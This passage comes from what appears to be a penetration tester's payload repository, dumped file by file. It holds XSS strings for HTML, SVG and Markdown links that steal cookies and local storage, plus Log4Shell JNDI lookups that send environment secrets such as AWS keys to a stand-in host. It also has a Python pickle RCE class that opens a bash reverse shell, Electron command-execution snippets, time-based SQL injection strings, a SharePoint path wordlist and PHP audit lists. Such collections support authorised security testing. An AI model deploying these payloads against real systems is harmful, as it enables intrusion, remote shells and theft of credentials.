72 | <table background="javascript:alert(12)"><tr><tr>12</tr></tr></table> 
73 | <a href="mhtml:13">13</a> 
74 | <a xlink:href="jAvaScript:alert(1)">14</a> 
75 | <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> 
76 | <a href="%E3%82%AA%E3%83%BC%E3%83">Invalid url</a>
77 | <a xlink:href="javascript:\u0061lert&#x28;1&#x29">test 7</a>
78 | <a xlink:href="javascript&#x3A;alert&lpar;document&period;cookie&rpar;">test 7</a>
79 | <a xlink:href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">test 7</a>
80 | <a xlink:href="vbscript:alert(1);">test 7</a>
81 | <a xlink:href="vbscript&#00058;alert(1);">test 7</a>
82 | <a xlink:href="vbscr&Tab;ipt:alert(1)">test 7</a>
83 | <a xlink:href="j&#x26;#x26#x41;vascript:alert%252831337%2529">test 7</a>
84 | <a xlink:href="javascript&colon;alert&#40/1/&#41">test 7</a>
85 | <a xlink:href="javas&tab;cript:alert(1)">test 7</a>
86 | <a xlink:href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">test 7</a>
87 | 


--------------------------------------------------------------------------------
/payloads/info.txt:
--------------------------------------------------------------------------------
1 | <?php 
2 | 
3 | phpinfo();
4 | 
5 | ?>
6 | 


--------------------------------------------------------------------------------
/payloads/log4j.txt:
--------------------------------------------------------------------------------
  1 | ${jndi:ldap://domain.com/j}
  2 | ${jndi:ldap:/domain.com/a}
  3 | ${jndi:dns:/domain.com}
  4 | ${jndi:dns://domain.com/j}
  5 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j}
  6 | ${${::-j}ndi:rmi://domain.com/j}
  7 | ${jndi:rmi://domainldap.com/j}
  8 | ${${lower:jndi}:${lower:rmi}://domain.com/j}
  9 | ${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j}
 10 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j}
 11 | ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j}
 12 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j}
 13 | ${jndi:${lower:l}${lower:d}a${lower:p}://domain.com}
 14 | ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a}
 15 | ${jn${env::-}di:ldap://domain.com/j}
 16 | ${jn${date:}di${date:':'}ldap://domain.com/j}
 17 | ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j}
 18 | ${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j}
 19 | ${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j}
 20 | ${j${::-nD}i${::-:}ldap://domain.com/j}
 21 | ${j${EnV:K5:-nD}i:ldap://domain.com/j}
 22 | ${j${loWer:Nd}i${uPper::}ldap://domain.com/j}
 23 | ${jndi:ldap://127.0.0.1#domain.com/j}
 24 | ${jnd${upper:ı}:ldap://domain.com/j}
 25 | ${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j}
 26 | ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j}
 27 | ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://domain.com/j}
 28 | ${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j}
 29 | ${\u006a\u006e\u0064\u0069:ldap://domain.com/j}
 30 | ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j}
 31 | ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j}
 32 | %24%7Bjndi:ldap://domain.com/j%7D
 33 | %24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D
 34 | 
 35 | # Docker Lookup
 36 | ${jndi:ldap://${docker:containerId}.domain.com/j}
 37 | ${jndi:ldap://${docker:containerName}.domain.com/j}
 38 | ${jndi:ldap://${docker:imageId}.domain.com/j}
 39 | ${jndi:ldap://${docker:imageName}.domain.com/j}
 40 | ${jndi:ldap://${docker:shortContainerId}.domain.com/j}
 41 | ${jndi:ldap://${docker:shortImageId}.domain.com/j}
 42 | 
 43 | # Environment Lookup
 44 | ${jndi:ldap://${env:USER}.domain.com/j}
 45 | ${jndi:ldap://${env:user}.domain.com/j}
 46 | ${jndi:ldap://${env:COMPUTERNAME}.domain.com/j}
 47 | ${jndi:ldap://${env:USERDOMAIN}.domain.com/j}
 48 | ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.domain.com/j}
 49 | ${jndi:ldap://${hostName}.domain.com/j}
 50 | ${jndi:ldap://${env:JAVA_VERSION}.domain.com/j}
 51 | 
 52 | # Java Lookup
 53 | ${jndi:ldap://${java:version}.domain.com/j}
 54 | ${jndi:ldap://${java:runtime}.domain.com/j}
 55 | ${jndi:ldap://${java:vm}.domain.com/j}
 56 | ${jndi:ldap://${java:os}.domain.com/j}
 57 | ${jndi:ldap://${java:locale}.domain.com/j}
 58 | ${jndi:ldap://${java:hw}.domain.com/j}
 59 | 
 60 | # Kubernetes Lookup
 61 | ${jndi:ldap://${k8s:accountName}.domain.com/j}
 62 | ${jndi:ldap://${k8s:clusterName}.domain.com/j}
 63 | ${jndi:ldap://${k8s:containerId}.domain.com/j}
 64 | ${jndi:ldap://${k8s:containerName}.domain.com/j}
 65 | ${jndi:ldap://${k8s:host}.domain.com/j}
 66 | ${jndi:ldap://${k8s:hostIp}.domain.com/j}
 67 | ${jndi:ldap://${k8s:labels.app}.domain.com/j}
 68 | ${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j}
 69 | ${jndi:ldap://${k8s:masterUrl}.domain.com/j}
 70 | ${jndi:ldap://${k8s:namespaceId}.domain.com/j}
 71 | ${jndi:ldap://${k8s:namespaceName}.domain.com/j}
 72 | ${jndi:ldap://${k8s:podId}.domain.com/j}
 73 | ${jndi:ldap://${k8s:podIp}.domain.com/j}
 74 | ${jndi:ldap://${k8s:podName}.domain.com/j}
 75 | ${jndi:ldap://${k8s:imageId}.domain.com/j}
 76 | ${jndi:ldap://${k8s:imageName}.domain.com/j}
 77 | ${jndi:ldap://.domain.com/j}
 78 | 
 79 | # Main Arguments Lookup
 80 | ${jndi:ldap://${main:0}.domain.com/j}
 81 | ${jndi:ldap://${main:1}.domain.com/j}
 82 | ${jndi:ldap://${main:2}.domain.com/j}
 83 | ${jndi:ldap://${main:3}.domain.com/j}
 84 | ${jndi:ldap://${main:4}.domain.com/j}
 85 | ${jndi:ldap://${main:\--file}.domain.com/j}
 86 | ${jndi:ldap://${main:\-x}.domain.com/j}
 87 | ${jndi:ldap://${main:bar}.domain.com/j}
 88 | ${jndi:ldap://${main:\--quiet:-true}.domain.com/j}
 89 | 
 90 | # Web Lookup
 91 | ${jndi:ldap://${web:attr.name}.domain.com/j}
 92 | ${jndi:ldap://${web:contextPath}.domain.com/j}
 93 | ${jndi:ldap://${web:contextPathName}.domain.com/j}
 94 | ${jndi:ldap://${web:effectiveMajorVersion}.domain.com/j}
 95 | ${jndi:ldap://${web:effectiveMinorVersion}.domain.com/j}
 96 | ${jndi:ldap://${web:initParam.name}.domain.com/j}
 97 | ${jndi:ldap://${web:majorVersion}.domain.com/j}
 98 | ${jndi:ldap://${web:minorVersion}.domain.com/j}
 99 | ${jndi:ldap://${web:rootDir}.domain.com/j}
100 | ${jndi:ldap://${web:serverInfo}.domain.com/j}
101 | ${jndi:ldap://${web:servletContextName}.domain.com/j}
102 | 
103 | # System Properties Lookup
104 | ${jndi:ldap://${sys:logPath}.domain.com/j}
105 | ${jndi:ldap://${sys:java.version}.domain.com/j}
106 | ${jndi:ldap://${sys:java.vendor}.domain.com/j}
107 | 
108 | # Structured Data Lookup
109 | ${jndi:ldap://${sys:logPath}.domain.com/j}
110 | 
111 | # Date Lookup
112 | ${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j}
113 | 
114 | # Context Map Lookup
115 | ${jndi:ldap://${ctx:loginId}.domain.com/j}
116 | 


--------------------------------------------------------------------------------
/payloads/mk.txt:
--------------------------------------------------------------------------------
 1 | <a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>
 2 | ![](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
 3 | <p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt=""></p>
 4 | [xss link](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
 5 | <p>[xss link](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)</p>
 6 | [Basic](javascript:alert('Basic'))
 7 | [Local Storage](javascript:alert(JSON.stringify(localStorage)))
 8 | [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
 9 | [URL](javascript://www.google.com%0Aalert('URL'))
10 | [In Quotes]('javascript:alert("InQuotes")')
11 | ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
12 | ![Escape SRC - onerror]("onerror="alert('ImageOnError'))
13 | [XSS](javascript:prompt(document.cookie))
14 | [XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
15 | [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
16 | [XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
17 | [XSS]: (javascript:prompt(document.cookie))
18 | [XSS](javascript:window.onerror=alert;throw%20document.cookie)
19 | [XSS](javascript://%0d%0aprompt(1))
20 | [XSS](javascript://%0d%0aprompt(1);com)
21 | [XSS](javascript:window.onerror=alert;throw%20document.cookie)
22 | [XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
23 | [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
24 | [XSS](vbscript:alert(document.domain))
25 | [XSS](javascript:this;alert(1))
26 | [XSS](javascript:this;alert(1&#41;)
27 | [XSS](javascript&#58this;alert(1&#41;)
28 | [XSS](Javas&#99;ript:alert(1&#41;)
29 | [XSS](Javas%26%2399;ript:alert(1&#41;)
30 | [XSS](javascript:alert&#65534;(1&#41;)
31 | [XSS](javascript:confirm(1)
32 | [XSS](javascript://www.google.com%0Aprompt(1))
33 | [XSS](javascript://%0d%0aconfirm(1);com)
34 | [XSS](javascript:window.onerror=confirm;throw%201)
35 | [XSS](�javascript:alert(document.domain&#41;)
36 | ![XSS](javascript:prompt(document.cookie))\
37 | ![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
38 | ![XSS'"`onerror=prompt(document.cookie)](x)\
39 | [XSS](javascript:prompt(document.cookie))
40 | [XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
41 | [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
42 | [XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
43 | [XSS]: (javascript:prompt(document.cookie))
44 | [XSS](javascript:window.onerror=alert;throw%20document.cookie)
45 | [XSS](javascript://%0d%0aprompt(1))
46 | [XSS](javascript://%0d%0aprompt(1);com)
47 | [XSS](javascript:window.onerror=alert;throw%20document.cookie)
48 | [XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
49 | [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
50 | [XSS](vbscript:alert(document.domain))
51 | [XSS](javascript:this;alert(1))
52 | [XSS](javascript:this;alert(1&#41;)
53 | [XSS](javascript&#58this;alert(1&#41;)
54 | [XSS](Javas&#99;ript:alert(1&#41;)
55 | [XSS](Javas%26%2399;ript:alert(1&#41;)
56 | [XSS](javascript:alert&#65534;(1&#41;)
57 | [XSS](javascript:confirm(1)
58 | [XSS](javascript://www.google.com%0Aprompt(1))
59 | [XSS](javascript://%0d%0aconfirm(1);com)
60 | [XSS](javascript:window.onerror=confirm;throw%201)
61 | [XSS](�javascript:alert(document.domain&#41;)
62 | ![XSS](javascript:prompt(document.cookie))\
63 | ![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
64 | ![XSS'"`onerror=prompt(document.cookie)](x)\
65 | ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
66 | ![Escape SRC - onerror]("onerror="alert('ImageOnError'))
67 | [Basic](javascript:alert('Basic'))
68 | [Local Storage](javascript:alert(JSON.stringify(localStorage)))
69 | [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
70 | [URL](javascript://www.google.com%0Aalert('URL'))
71 | [In Quotes]('javascript:alert("InQuotes")')
72 | 


--------------------------------------------------------------------------------
/payloads/php-grep:
--------------------------------------------------------------------------------
 1 | 
 2 | # These are a collection of egrep commands that may be useful to penetration testers
 3 | # working in a PHP environment, auditing source code.
 4 | 
 5 | # this command searches all PHP files in a directory for vulnerable shell functions
 6 | egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" .
 7 | 
 8 | # this command searches all PHP files in a directory for certain vulnerable php execution functions
 9 | egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" .
10 | 
11 | # this command returns instances where variables are echoed out without htmlspecialchars()
12 | # it can be useful for finding XSS vulnerabilities in PHP code
13 | egrep -r --include "*.php" -e "echo\s*\\$.*;" .
14 | 
15 | # this command returns all instances of the back-tick (`) operator, which is used to execute arbitary shell commands in PHP
16 | # many times this returns string literals
17 | egrep -r --include "*.php" -e "\`.*\`" .
18 | 
19 | # this command will return hard-coded database credentials / addresses
20 | egrep -r --include "*.php" -e "(mysql_connect|mysqli)\(\s*(\"|\').+(\"|\')\,\s*(\"|\').+(\"|\')\,\s*(\"|\').+(\"|\')" .
21 | 
22 | # this command will return potential unsafe SQL query executions:
23 | egrep -r --include "*.php" -e "\->(query|exec)\(\s*\".*\".*\." .
24 | 
25 | # this command will return all PHP files in a directory for file system access
26 | egrep -r --include "*.php" -e "(fopen|fread|fwrite|fclose)\(" .
27 | 
28 | # this command will return instances where crypto operations are performed
29 | egrep -r --include "*.php" -e "mcrypt_|openssl_|mhash_|random_|crack_" .
30 | 
31 | # this command will return instances of weak PRNG's
32 | # look for hard coded seed values!
33 | egrep -r --include "*.php" -e "(mt_srand|lcg_value|rand)\(\s*\d+" .
34 | 
35 | # this command will return instances where XXE might be possible
36 | # look for 'true'
37 | egrep -r --include "*.php" -e "libxml_disable_entity_loader\(" .
38 | 
39 | # look for hard coded port values
40 | egrep -r --include "*.php" -e "(\\$|\->)port\s*\=\s*\d+" .
41 | 
42 | # this command will look for hardcoded usernames and passwords
43 | egrep -r --include "*.php" -e "(\\$|\->)?(\\[\")?(user|pass|username|password)(\"\\])?\s*=\s*\".*\"" .
44 | 


--------------------------------------------------------------------------------
/payloads/php_dangerous.txt:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | 
  4 | Stolen from here: https://stackoverflow.com/a/3697776 and https://github.com/v-p-b/DangerousPHPFunctions
  5 | 
  6 | 
  7 | [Command execution]
  8 | passthru
  9 | exec
 10 | pnctl_exec
 11 | proc_open
 12 | popen
 13 | system
 14 | shell_exec
 15 | register_shutdown_function
 16 | register_tick_function
 17 | dl
 18 | eval
 19 | expect_popen
 20 | exec           - Returns last line of commands output
 21 | passthru       - Passes commands output directly to the browser
 22 | system         - Passes commands output directly to the browser and returns last line
 23 | shell_exec     - Returns commands output
 24 | \`\` (backticks) - Same as shell_exec()
 25 | popen          - Opens read or write pipe to process of a command
 26 | proc_open      - Similar to popen() but greater degree of control
 27 | pcntl_exec     - Executes a program
 28 | 
 29 | 
 30 | 
 31 | [Code Execution]
 32 | eval 
 33 | assert()  - identical to eval()
 34 | preg_replace('/.*/e',...) - /e does an eval() on the match
 35 | create_function()
 36 | include()
 37 | include_once()
 38 | require()
 39 | require_once()
 40 | $_GET['func_name']($_GET['argument']);
 41 | $func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());
 42 | 
 43 | [Limited command execution]
 44 | apache_child_terminate
 45 | link
 46 | posix_kill
 47 | posix_mkfifo
 48 | posix_setpgid
 49 | posix_setsid
 50 | posix_setuid
 51 | proc_close
 52 | proc_get_status
 53 | proc_nice
 54 | proc_terminate
 55 | putenv
 56 | touch
 57 | 
 58 | [File access]
 59 | alter_ini
 60 | highlight_file
 61 | show_source
 62 | ini_alter
 63 | fgetcsv
 64 | fputcsv
 65 | fpassthru
 66 | ini_get_all
 67 | openlog
 68 | syslog
 69 | rename
 70 | copy
 71 | parse_ini_file
 72 | 
 73 | [Network]
 74 | ftp_connect
 75 | ftp_ssl_connect
 76 | fsockopen
 77 | pfsockopen
 78 | socket_bind
 79 | socket_connect
 80 | socket_listen
 81 | socket_create_listen
 82 | socket_accept
 83 | socket_getpeername
 84 | socket_send
 85 | 
 86 | [Other]
 87 | apache_get_modules
 88 | apache_get_version
 89 | apache_getenc
 90 | apache_note
 91 | apache_setenv
 92 | apache_request_headers
 93 | diskfreespace
 94 | disk_free_space
 95 | get_current_user
 96 | getmypid
 97 | getmyuid
 98 | getrusage
 99 | set_time_limit
100 | show_source
101 | symlink
102 | tmpfile
103 | virtual
104 | phpinfo
105 | max_execution_time
106 | set_include_path
107 | 
108 | [ Why are these even implemented? ]
109 | escapeshellcmd
110 | escapeshellarg
111 | 
112 | 
113 | 
114 | [Likely Used]
115 | include
116 | include_once
117 | require
118 | require_once
119 | preg_replace 
120 | chown
121 | chgrp
122 | file_put_contents
123 | fwrite
124 | fputs
125 | sleep
126 | header
127 | mail
128 | unlink
129 | mkdir
130 | rmdir
131 | 
132 | 
133 | 
134 | [List of functions which accept callbacks]
135 | Function                     => Position of callback arguments
136 | 'ob_start'                   =>  0,
137 | 'array_diff_uassoc'          => -1,
138 | 'array_diff_ukey'            => -1,
139 | 'array_filter'               =>  1,
140 | 'array_intersect_uassoc'     => -1,
141 | 'array_intersect_ukey'       => -1,
142 | 'array_map'                  =>  0,
143 | 'array_reduce'               =>  1,
144 | 'array_udiff_assoc'          => -1,
145 | 'array_udiff_uassoc'         => array(-1, -2),
146 | 'array_udiff'                => -1,
147 | 'array_uintersect_assoc'     => -1,
148 | 'array_uintersect_uassoc'    => array(-1, -2),
149 | 'array_uintersect'           => -1,
150 | 'array_walk_recursive'       =>  1,
151 | 'array_walk'                 =>  1,
152 | 'assert_options'             =>  1,
153 | 'uasort'                     =>  1,
154 | 'uksort'                     =>  1,
155 | 'usort'                      =>  1,
156 | 'preg_replace_callback'      =>  1,
157 | 'spl_autoload_register'      =>  0,
158 | 'iterator_apply'             =>  1,
159 | 'call_user_func'             =>  0,
160 | 'call_user_func_array'       =>  0,
161 | 'register_shutdown_function' =>  0,
162 | 'register_tick_function'     =>  0,
163 | 'set_error_handler'          =>  0,
164 | 'set_exception_handler'      =>  0,
165 | 'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),
166 | 'sqlite_create_aggregate'    => array(2, 3),
167 | 'sqlite_create_function'     =>  2,
168 | 
169 | 
170 | [Information Disclosure]
171 | phpinfo
172 | posix_mkfifo
173 | posix_getlogin
174 | posix_ttyname
175 | getenv
176 | get_current_user
177 | proc_get_status
178 | get_cfg_var
179 | disk_free_space
180 | disk_total_space
181 | diskfreespace
182 | getcwd
183 | getlastmo
184 | getmygid
185 | getmyinode
186 | getmypid
187 | getmyuid
188 | 
189 | 
190 | [Other]
191 | extract - Opens the door for register_globals attacks (see study in scarlet).
192 | parse_str -  works like extract if only one argument is given.  
193 | putenv
194 | ini_set
195 | mail - has CRLF injection in the 3rd parameter, opens the door for spam. 
196 | header - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area. 
197 | proc_nice
198 | proc_terminate
199 | proc_close
200 | pfsockopen
201 | fsockopen
202 | apache_child_terminate
203 | posix_kill
204 | posix_mkfifo
205 | posix_setpgid
206 | posix_setsid
207 | posix_setuid
208 | 
209 | 
210 | 
211 | [Filesystem Functions]
212 | fopen
213 | tmpfile
214 | bzopen
215 | gzopen
216 | SplFileObject->__construct
217 | // write to filesystem (partially in combination with reading)
218 | chgrp
219 | chmod
220 | chown
221 | copy
222 | file_put_contents
223 | lchgrp
224 | lchown
225 | link
226 | mkdir
227 | move_uploaded_file
228 | rename
229 | rmdir
230 | symlink
231 | tempnam
232 | touch
233 | unlink
234 | imagepng   - 2nd parameter is a path.
235 | imagewbmp  - 2nd parameter is a path. 
236 | image2wbmp - 2nd parameter is a path. 
237 | imagejpeg  - 2nd parameter is a path.
238 | imagexbm   - 2nd parameter is a path.
239 | imagegif   - 2nd parameter is a path.
240 | imagegd    - 2nd parameter is a path.
241 | imagegd2   - 2nd parameter is a path.
242 | iptcembed
243 | ftp_get
244 | ftp_nb_get
245 | // read from filesystem
246 | file_exists
247 | file_get_contents
248 | file
249 | fileatime
250 | filectime
251 | filegroup
252 | fileinode
253 | filemtime
254 | fileowner
255 | fileperms
256 | filesize
257 | filetype
258 | glob
259 | is_dir
260 | is_executable
261 | is_file
262 | is_link
263 | is_readable
264 | is_uploaded_file
265 | is_writable
266 | is_writeable
267 | linkinfo
268 | lstat
269 | parse_ini_file
270 | pathinfo
271 | readfile
272 | readlink
273 | realpath
274 | stat
275 | gzfile
276 | readgzfile
277 | getimagesize
278 | imagecreatefromgif
279 | imagecreatefromjpeg
280 | imagecreatefrompng
281 | imagecreatefromwbmp
282 | imagecreatefromxbm
283 | imagecreatefromxpm
284 | ftp_put
285 | ftp_nb_put
286 | exif_read_data
287 | read_exif_data
288 | exif_thumbnail
289 | exif_imagetype
290 | hash_file
291 | hash_hmac_file
292 | hash_update_file
293 | md5_file
294 | sha1_file
295 | highlight_file
296 | show_source
297 | php_strip_whitespace
298 | get_meta_tags
299 | 
300 | 


--------------------------------------------------------------------------------
/payloads/pickle.py:
--------------------------------------------------------------------------------
 1 | import cPickle
 2 | import sys
 3 | import base64
 4 | 
 5 | 
 6 | COMMAND = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
 7 | 
 8 | class PickleRce(object):
 9 |     def __reduce__(self):
10 |         import os
11 |         return (os.system,(COMMAND,))
12 | 


--------------------------------------------------------------------------------
/payloads/ptcurl.txt:
--------------------------------------------------------------------------------
1 | curl --path-as-is $(echo -e -n "http://127.0.0.1:8080/existing-dir-name?\x0cfoo")
2 | 


--------------------------------------------------------------------------------
/payloads/sharepointwordlist.txt:
--------------------------------------------------------------------------------
  1 | _layouts/aclinv.aspx
  2 | _Layouts/AreaWelcomePage.aspx
  3 | _layouts/AdminRecycleBin.aspx
  4 | _layouts/create.aspx
  5 | _layouts/associatedgroups.aspx
  6 | _layouts/bpcf.aspx
  7 | _layouts/AreaNavigationSettings.aspx
  8 | _Layouts/AreaTemplateSettings.aspx
  9 | _layouts/addrole.aspx
 10 | _Layouts/ChangeSiteMasterPage.aspx
 11 | _layouts/editgrp.aspx
 12 | _layouts/groups.aspx
 13 | _layouts/listedit.aspx
 14 | _layouts/editprms.aspx
 15 | _layouts/help.aspx
 16 | _layouts/ManageFeatures.aspx
 17 | _layouts/mcontent.aspx
 18 | _layouts/ManageFeatures.aspx
 19 | _layouts/mngctype.aspx
 20 | _layouts/mngfield.aspx
 21 | _layouts/mngsiteadmin.aspx
 22 | _layouts/mngsubwebs.aspx
 23 | _layouts/mngsubwebs.aspx?view=sites
 24 | _layouts/MyPage.aspx
 25 | _layouts/mobile/mbllists.aspx
 26 | _layouts/navoptions.aspx
 27 | _layouts/MyInfo.aspx
 28 | _layouts/newsbweb.aspx
 29 | _layouts/people.aspx
 30 | _layouts/MyTasks.aspx
 31 | _layouts/NewDwp.aspx
 32 | _layouts/picker.aspx
 33 | _layouts/people.aspx?MembershipGroupId=0
 34 | _layouts/newgrp.aspx
 35 | _layouts/PageSettings.aspx
 36 | _layouts/permsetup.aspx
 37 | _layouts/policy.aspx
 38 | _layouts/policyconfig.aspx
 39 | _layouts/prjsetng.aspx
 40 | _layouts/policycts.aspx
 41 | _Layouts/RedirectPage.aspx
 42 | _layouts/recyclebin.aspx
 43 | _layouts/Policylist.aspx
 44 | _layouts/role.aspx
 45 | _layouts/settings.aspx
 46 | _layouts/quiklnch.aspx
 47 | _layouts/SiteManager.aspx?lro=all
 48 | _layouts/spcf.aspx
 49 | _layouts/storman.aspx
 50 | _layouts/user.aspx
 51 | _layouts/topnav.aspx
 52 | _layouts/userdisp.aspx
 53 | _layouts/userdisp.aspx?ID=1
 54 | _layouts/viewgrouppermissions.aspx
 55 | _layouts/useredit.aspx?ID=1
 56 | _layouts/viewlsts.aspx
 57 | _layouts/themeweb.aspx
 58 | _layouts/useredit.aspx
 59 | _layouts/SiteDirectorySettings.aspx
 60 | _layouts/sitemanager.aspx
 61 | _layouts/WPPrevw.aspx?ID=247
 62 | _layouts/vsubwebs.aspx
 63 | _layouts/wrkmng.aspx
 64 | Forms/DispForm.aspx
 65 | Forms/EditForm.aspx
 66 | Forms/NewForm.aspx
 67 | Pages/default.aspx
 68 | Forms/Forms/AllItems.aspx
 69 | Forms/DispForm.aspx?ID=1
 70 | Forms/AllItems.aspx
 71 | Forms/MyItems.aspx
 72 | Forms/EditForm.aspx?ID=1
 73 | Pages/Forms/AllItems.aspx
 74 | default.aspx
 75 | _catalogs/masterpage/Forms/AllItems.aspx
 76 | _catalogs/wp/Forms/AllItems.aspx
 77 | _catalogs/wt/Forms/Common.aspx
 78 | _vti_bin/spsdisco.aspx
 79 | _vti_bin/alerts.asmx
 80 | _vti_bin/dspsts.asmx
 81 | _vti_bin/copy.asmx
 82 | _vti_bin/forms.asmx
 83 | _vti_bin/dws.asmx
 84 | _vti_bin/imaging.asmx
 85 | _vti_bin/diagnostics.asmx
 86 | _vti_bin/lists.asmx
 87 | _vti_bin/meetings.asmx
 88 | _vti_bin/Authentication.asmx
 89 | _vti_bin/People.asmx
 90 | _vti_bin/sites.asmx
 91 | _vti_bin/permissions.asmx
 92 | _vti_bin/SharepointEmailWS.asmx
 93 | _vti_bin/spsearch.asmx
 94 | _vti_bin/views.asmx
 95 | _vti_bin/versions.asmx
 96 | _vti_bin/SiteData.asmx
 97 | _vti_bin/UserGroup.asmx
 98 | _vti_bin/WebPartPages.asmx
 99 | _vti_bin/webs.asmx
100 | _vti_bin/search.asmx
101 | _vti_bin/UserProfileService.asmx
102 | _vti_bin/spscrawl.asmx
103 | _vti_bin/SharepointEmailWS.asmx
104 | _vti_bin/ExcelService.asmx
105 | _vti_bin/BusinessDataCatalog.asmx
106 | 


--------------------------------------------------------------------------------
/payloads/shell.js:
--------------------------------------------------------------------------------
1 | window.require('child_process').exec('echo foo > /tmp/test.txt',function(){})
2 | 


--------------------------------------------------------------------------------
/payloads/shell.phar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/payloads/shell.phar


--------------------------------------------------------------------------------
/payloads/shell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/payloads/shell.zip


--------------------------------------------------------------------------------
/payloads/shell2.js:
--------------------------------------------------------------------------------
 1 | const { exec } = require("child_process");
 2 | 
 3 | exec("ls -la", (error, stdout, stderr) => {
 4 |     if (error) {
 5 |         console.log(`error: ${error.message}`);
 6 |         return;
 7 |     }
 8 |     if (stderr) {
 9 |         console.log(`stderr: ${stderr}`);
10 |         return;
11 |     }
12 |     console.log(`stdout: ${stdout}`);
13 | });
14 | 


--------------------------------------------------------------------------------
/payloads/shell3.js:
--------------------------------------------------------------------------------
1 | window.require('child_process').execFile('/Applications/Calculator.app/Contents/MacOS/Calculator',function(){})
2 | 


--------------------------------------------------------------------------------
/payloads/sqli_timebased.txt:
--------------------------------------------------------------------------------
  1 | mysql delay---
  2 | waitfor delay '0:0:10'--
  3 | +waitfor+delay+'0:0:10'--
  4 | /**/waitfor/**/delay/**/'0:0:10'--
  5 | %20waitfor%20delay%20'0:0:20'--
  6 |  waitfor delay '0:0:10'/*
  7 | +waitfor+delay+'0:0:10'/*
  8 | /**/waitfor/**/delay/**/'0:0:10'/*
  9 | %20waitfor%20delay%20'0:0:20'/*
 10 | '  waitfor delay '0:0:10'--+
 11 | '+waitfor+delay+'0:0:10'--+
 12 | '/**/ waitfor/**/delay/**/'0:0:10'--+
 13 | '%20waitfor%20delay%20'0:0:20'--+
 14 | mysql benchmark -----
 15 |  and 0=benchmark(*index*,MD5(1))--
 16 | +and+0=benchmark(*index*,MD5(1))+--
 17 | /**/and/**/0=benchmark(*index*,MD5(1))/**/--
 18 | %20and%200=benchmark(*index*,MD5(1))%20--
 19 |  and 0=benchmark(*index*,MD5(1))/*
 20 | +and+0=benchmark(*index*,MD5(1))+/*
 21 | /**/and/**/0=benchmark(*index*,MD5(1))/**//*
